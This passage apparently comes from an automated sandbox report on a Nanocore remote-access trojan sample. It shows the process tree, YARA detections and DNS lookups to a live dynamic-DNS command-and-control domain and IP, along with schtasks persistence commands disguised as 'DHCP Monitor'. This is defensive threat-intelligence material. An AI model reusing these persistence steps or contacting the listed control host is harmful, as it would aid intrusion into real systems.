        KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
        gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

        Possible Origin

        Language of compilation system | Country where language is spoken | Map
        English | United States |

        Network Behavior

        Snort IDS Alerts

        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
        10/11/21-22:29:37.142185 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 53910 | 8.8.8.8 | 192.168.2.3
        10/11/21-22:29:55.963084 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52130 | 8.8.8.8 | 192.168.2.3
        10/11/21-22:31:05.092278 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 55393 | 8.8.8.8 | 192.168.2.3

        TCP Packets

        UDP Packets

        DNS Queries

        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
        Oct 11, 2021 22:29:16.670052052 CEST | 192.168.2.3 | 8.8.8.8 | 0xcd37 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:29:37.122045994 CEST | 192.168.2.3 | 8.8.8.8 | 0xbdd8 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:29:55.940438032 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfba | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:30:30.033157110 CEST | 192.168.2.3 | 8.8.8.8 | 0xda86 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:30:47.756072044 CEST | 192.168.2.3 | 8.8.8.8 | 0xa386 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:31:05.071070910 CEST | 192.168.2.3 | 8.8.8.8 | 0x8eb | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001)

        DNS Answers

        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
        Oct 11, 2021 22:29:16.686587095 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd37 | No error (0) | strongodss.ddns.net | | 197.210.84.227 | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:29:37.142184973 CEST | 8.8.8.8 | 192.168.2.3 | 0xbdd8 | No error (0) | strongodss.ddns.net | | 197.210.84.227 | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:29:55.963083982 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfba | No error (0) | strongodss.ddns.net | | 197.210.84.227 | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:30:30.051671982 CEST | 8.8.8.8 | 192.168.2.3 | 0xda86 | No error (0) | strongodss.ddns.net | | 197.210.84.227 | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:30:47.775213003 CEST | 8.8.8.8 | 192.168.2.3 | 0xa386 | No error (0) | strongodss.ddns.net | | 197.210.84.227 | A (IP address) | IN (0x0001)
        Oct 11, 2021 22:31:05.092278004 CEST | 8.8.8.8 | 192.168.2.3 | 0x8eb | No error (0) | strongodss.ddns.net | | 197.210.84.227 | A (IP address) | IN (0x0001)

        Code Manipulations

        System Behavior

        General

        Start time:22:28:50
        Start date:11/10/2021
        Path:C:\Users\user\Desktop\dUzAkYsvl8.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\Desktop\dUzAkYsvl8.exe'
        Imagebase:0x1f0000
        File size:1021780 bytes
        MD5 hash:9A4A8643DB95A8C0FE52AF8675A5D1B1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low

        General

        Start time:22:28:57
        Start date:11/10/2021
        Path:C:\Users\user\77066510\cjlaro.pif
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr
        Imagebase:0x1130000
        File size:776432 bytes
        MD5 hash:279DAE7236F5F2488A4BACDE6027F730
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        • Detection: 37%, Metadefender
        • Detection: 56%, ReversingLabs
        Reputation:low

        General

        Start time:22:29:02
        Start date:11/10/2021
        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Imagebase:0x120000
        File size:45152 bytes
        MD5 hash:2867A3817C9245F7CF518524DFD18F28
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, Author: Joe Security
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, Author: Joe Security
        Reputation:high

        General

        Start time:22:29:10
        Start date:11/10/2021
        Path:C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit):true
        Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'
        Imagebase:0x10d0000
        File size:185856 bytes
        MD5 hash:15FF7D8324231381BAD48A052F85DF04
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit):true
        Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
        Imagebase:0x7ff70d6e0000
        File size:185856 bytes
        MD5 hash:15FF7D8324231381BAD48A052F85DF04
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Users\user\77066510\cjlaro.pif
        Wow64 process (32bit):false
        Commandline:'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
        Imagebase:0x1130000
        File size:776432 bytes
        MD5 hash:279DAE7236F5F2488A4BACDE6027F730
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:low

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:22:29:14
        Start date:11/10/2021
        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
        Imagebase:0xf50000
        File size:45152 bytes
        MD5 hash:2867A3817C9245F7CF518524DFD18F28
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Reputation:high

        General

        Start time:22:29:16
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:22:29:16
        Start date:11/10/2021
        Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Wow64 process (32bit):true
        Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Imagebase:0xd30000
        File size:45152 bytes
        MD5 hash:2867A3817C9245F7CF518524DFD18F28
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Antivirus matches:
        • Detection: 0%, Metadefender
        • Detection: 0%, ReversingLabs

        General

        Start time:22:29:17
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language

        General

        Start time:22:29:18
        Start date:11/10/2021
        Path:C:\Users\user\77066510\cjlaro.pif
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
        Imagebase:0x1130000
        File size:776432 bytes
        MD5 hash:279DAE7236F5F2488A4BACDE6027F730
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

        General

        Start time:22:29:21
        Start date:11/10/2021
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs'
        Imagebase:0x7ff63d490000
        File size:163840 bytes
        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
        Has elevated privileges:false
        Has administrator privileges:false
